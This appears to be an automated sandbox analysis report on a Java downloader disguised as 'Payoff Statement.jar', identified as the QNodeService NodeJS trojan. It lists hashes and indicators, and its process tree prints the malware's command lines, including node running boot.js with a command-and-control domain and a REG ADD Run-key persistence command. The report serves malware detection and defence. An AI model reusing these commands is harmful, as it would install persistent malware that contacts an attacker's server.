Analysis
-
max time kernel
35s -
max time network
125s -
platform
windows10_x64 -
resource
win10 -
submitted
16-10-2020 10:41
Static task
static1
Behavioral task
behavioral1
Sample
Payoff Statement.jar
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Payoff Statement.jar
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
Payoff Statement.jar
-
Size
107KB
-
MD5
71747772db1e1a0d72cc715270b1d81f
-
SHA1
10e88b56fd0c2b37ff3c570bd15e5b1f4ca35546
-
SHA256
ca387dd7da00ab25ce6ba103baca69def6babbc0dc8ccfa2fbc901a37a7de364
-
SHA512
10b37a12cbd0a0efa370cdb9b051b68a042471bde62b2af1221ef759249c352ed6afee522a24ead2b1cfcb48f74bb36a43c4ac0a2022da27214577ac1e9b7e01
Score
10/10
Malware Config
Signatures
-
QNodeService
Trojan/stealer written in NodeJS and spread via Java downloader.
-
Executes dropped EXE 3 IoCs
pid Process 3508 node.exe 3612 node.exe 3532 node.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\329d06e0-5011-4c3e-94a5-ca3241ca99a9 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\"" reg.exe -
JavaScript code in executable 3 IoCs
resource yara_rule behavioral2/files/0x000100000001ada5-164.dat js behavioral2/files/0x000100000001ada5-169.dat js behavioral2/files/0x000100000001ada5-173.dat js -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 wtfismyip.com 24 wtfismyip.com -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString node.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz node.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString node.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 3508 node.exe 3508 node.exe 3508 node.exe 3508 node.exe 3612 node.exe 3612 node.exe 3612 node.exe 3612 node.exe 3532 node.exe 3532 node.exe 3532 node.exe 3532 node.exe 3532 node.exe 3532 node.exe 3532 node.exe 3532 node.exe 3532 node.exe 3532 node.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 980 wrote to memory of 2252 980 java.exe 76 PID 980 wrote to memory of 2252 980 java.exe 76 PID 2252 wrote to memory of 3508 2252 javaw.exe 78 PID 2252 wrote to memory of 3508 2252 javaw.exe 78 PID 3508 wrote to memory of 3612 3508 node.exe 80 PID 3508 wrote to memory of 3612 3508 node.exe 80 PID 3612 wrote to memory of 3532 3612 node.exe 81 PID 3612 wrote to memory of 3532 3612 node.exe 81 PID 3532 wrote to memory of 3920 3532 node.exe 83 PID 3532 wrote to memory of 3920 3532 node.exe 83 PID 3920 wrote to memory of 3972 3920 cmd.exe 84 PID 3920 wrote to memory of 3972 3920 cmd.exe 84
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar "C:\Users\Admin\AppData\Local\Temp\Payoff Statement.jar"1⤵
- Suspicious use of WriteProcessMemory
PID:980 -
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\b617a428.tmp2⤵
- Suspicious use of WriteProcessMemory
PID:2252 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain severdops.ddns.net3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_ygdoui\boot.js --hub-domain severdops.ddns.net4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3612 -
C:\Users\Admin\node-v14.12.0-win-x64\node.exeC:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_ygdoui\boot.js --hub-domain severdops.ddns.net5⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "329d06e0-5011-4c3e-94a5-ca3241ca99a9" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""6⤵
- Suspicious use of WriteProcessMemory
PID:3920 -
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "329d06e0-5011-4c3e-94a5-ca3241ca99a9" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""7⤵
- Adds Run key to start application
PID:3972
-
-
-
-
-
-